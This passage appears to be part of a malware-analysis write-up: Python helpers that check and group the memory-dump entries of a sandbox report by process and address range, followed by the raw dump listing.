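    """Render a byte count the way the report does: 1B, 216KB, 9.9MB."""
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    if n >= 1 << 10:
        return f"{n // (1 << 10)}KB"
    return f"{n}B"


def classify_region(region):
    """Heuristic label for what a dumped range most likely holds."""
    base = DEFAULT_IMAGE_BASES.get(region["start"])
    if base is not None:
        return f"likely PE image ({base})"
    if region["start"] >= 0x7FF000000000:
        return "high user-mode address (typical of ASLR-loaded system DLLs)"
    return "private allocation (heap/unpacking buffer)"


def check_report(entries):
    """Recompute every size from its address range, compare with the reported
    Filesize, and group distinct ranges per pid with a dump count and label."""
    mismatches, by_pid = [], {}
    for name, reported in entries:
        r = parse_memory_name(name)
        if human_size(r["size"]) != reported:
            mismatches.append((name, reported, human_size(r["size"])))
        ranges = by_pid.setdefault(r["pid"], {})
        info = ranges.setdefault((r["start"], r["end"]),
                                 {"dumps": 0, "label": classify_region(r)})
        info["dumps"] += 1
    return mismatches, by_pid


def recover_one_byte_file(md5_hex, sha256_hex):
    """A 1-byte file is fully determined by its hashes: try all 256 values
    and return the byte whose MD5 and SHA-256 both match, else None."""
    for b in range(256):
        data = bytes([b])
        if (hashlib.md5(data).hexdigest() == md5_hex
                and hashlib.sha256(data).hexdigest() == sha256_hex):
            return data
    return None


if __name__ == "__main__":
    bad, summary = check_report(REPORT_ENTRIES)
    print("size mismatches:", bad)
    for pid, ranges in sorted(summary.items()):
        for (s, e), info in ranges.items():
            print(f"pid {pid}: {s:#x}-{e:#x} dumped x{info['dumps']}  {info['label']}")
    # version.txt from the report: 1 byte, MD5 c81e728d..., SHA256 d4735e3a...
    print("version.txt content:", recover_one_byte_file(
        "c81e728d9d4c2f636f067f89cc14862c",
        "d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35"))
```

Run against the full listing, the same range under pid 668 (0x140000000-0x140848000) appears many times with different indices, so the per-pid summary collapses them to one range with a dump count; that range and the 0x400000 regions under pids 888, 1732 and 1824 are the ones to carve as PE images, while the 0x7FFA... region under pid 612 is in the range where system DLLs load and is rarely worth a second look.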
• memory/612-3-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp, Filesize: 9.9MB
• memory/612-0-0x00007FFA76483000-0x00007FFA76484000-memory.dmp, Filesize: 4KB
• memory/612-1-0x0000000000A20000-0x0000000000A28000-memory.dmp, Filesize: 32KB
• memory/612-2-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp, Filesize: 9.9MB
• memory/668-186-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-95-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-92-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-90-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-89-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-96-0x00000000012E0000-0x0000000001300000-memory.dmp, Filesize: 128KB
• memory/668-97-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-91-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-93-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-94-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-103-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-100-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-99-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/668-98-0x0000000140000000-0x0000000140848000-memory.dmp, Filesize: 8.3MB
• memory/888-181-0x0000000000400000-0x0000000000863000-memory.dmp, Filesize: 4.4MB
• memory/1072-304-0x00000000046F0000-0x0000000004726000-memory.dmp, Filesize: 216KB
• memory/1072-403-0x000000000A1F0000-0x000000000A868000-memory.dmp, Filesize: 6.5MB
• memory/1072-395-0x0000000009050000-0x00000000090E4000-memory.dmp, Filesize: 592KB
• memory/1072-396-0x0000000008D70000-0x0000000008D8A000-memory.dmp, Filesize: 104KB
• memory/1072-397-0x0000000008DC0000-0x0000000008DE2000-memory.dmp, Filesize: 136KB
• memory/1072-340-0x0000000008030000-0x00000000080A6000-memory.dmp, Filesize: 472KB
• memory/1072-333-0x0000000007780000-0x000000000779C000-memory.dmp, Filesize: 112KB
• memory/1072-321-0x00000000077B0000-0x0000000007816000-memory.dmp, Filesize: 408KB
• memory/1072-323-0x0000000007890000-0x0000000007BE0000-memory.dmp, Filesize: 3.3MB
• memory/1072-320-0x0000000007710000-0x0000000007732000-memory.dmp, Filesize: 136KB
• memory/1072-305-0x0000000006FB0000-0x00000000075D8000-memory.dmp, Filesize: 6.2MB
• memory/1144-67-0x00000000059C0000-0x00000000059FE000-memory.dmp, Filesize: 248KB
• memory/1144-284-0x0000000007470000-0x0000000007632000-memory.dmp, Filesize: 1.8MB
• memory/1144-53-0x0000000000E60000-0x0000000000EB0000-memory.dmp, Filesize: 320KB
• memory/1144-54-0x0000000005CE0000-0x00000000061DE000-memory.dmp, Filesize: 5.0MB
• memory/1144-130-0x0000000006F90000-0x0000000006FE0000-memory.dmp, Filesize: 320KB
• memory/1144-71-0x0000000005B60000-0x0000000005BAB000-memory.dmp, Filesize: 300KB
• memory/1144-66-0x0000000005960000-0x0000000005972000-memory.dmp, Filesize: 72KB
• memory/1144-57-0x00000000056F0000-0x0000000005782000-memory.dmp, Filesize: 584KB
• memory/1144-129-0x00000000062E0000-0x0000000006346000-memory.dmp, Filesize: 408KB
• memory/1144-65-0x0000000005A50000-0x0000000005B5A000-memory.dmp, Filesize: 1.0MB
• memory/1144-286-0x0000000008380000-0x00000000088AC000-memory.dmp, Filesize: 5.2MB
• memory/1144-62-0x00000000067F0000-0x0000000006DF6000-memory.dmp, Filesize: 6.0MB
• memory/1144-61-0x00000000057A0000-0x00000000057AA000-memory.dmp, Filesize: 40KB
• memory/1732-221-0x0000000000400000-0x0000000000863000-memory.dmp, Filesize: 4.4MB
• memory/1732-175-0x0000000010000000-0x0000000010362000-memory.dmp, Filesize: 3.4MB
• memory/1732-176-0x0000000010000000-0x0000000010362000-memory.dmp, Filesize: 3.4MB
• memory/1732-172-0x0000000010000000-0x0000000010362000-memory.dmp, Filesize: 3.4MB
• memory/1824-419-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/1824-225-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/1824-224-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/1824-226-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/2424-198-0x000000006C090000-0x000000006C0CA000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            232KB

                                                                                                                                                          • memory/2424-196-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/2424-195-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/2424-194-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/2424-223-0x0000000000400000-0x0000000000863000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                          • memory/2568-124-0x0000000000E00000-0x00000000011FE000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.0MB

                                                                                                                                                          • memory/2644-414-0x00007FF783B70000-0x00007FF7841A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/3008-421-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-220-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-43839-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-781442-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-149-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3008-156-0x00000000001D0000-0x00000000001E4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            80KB

                                                                                                                                                          • memory/3008-411-0x0000000140000000-0x0000000140B75000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            11.5MB

                                                                                                                                                          • memory/3720-285-0x0000019321490000-0x00000193214B2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/3720-309-0x0000019321640000-0x00000193216B6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            472KB

                                                                                                                                                          • memory/4192-141-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/4192-161-0x0000000000400000-0x0000000000863000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4.4MB

                                                                                                                                                          • memory/4192-145-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/4192-144-0x0000000010000000-0x0000000010362000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            3.4MB

                                                                                                                                                          • memory/4464-420-0x0000000000400000-0x0000000000443000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            268KB

                                                                                                                                                          • memory/4684-197-0x00007FF6CDC40000-0x00007FF6CE276000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4684-146-0x00007FF6CDC40000-0x00007FF6CE276000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4684-201-0x00007FF6CDC40000-0x00007FF6CE276000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4756-147-0x00007FF6810A0000-0x00007FF6810C4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            144KB

                                                                                                                                                          • memory/5044-200-0x00000000027A0000-0x00000000027F6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/5044-199-0x00000000027A0000-0x00000000027F6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/6256-24951-0x00000227AAC10000-0x00000227AACC9000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            740KB

                                                                                                                                                          • memory/6256-24945-0x0000022792390000-0x00000227923AC000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            112KB

                                                                                                                                                          • memory/6256-24991-0x00000227923B0000-0x00000227923BA000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            40KB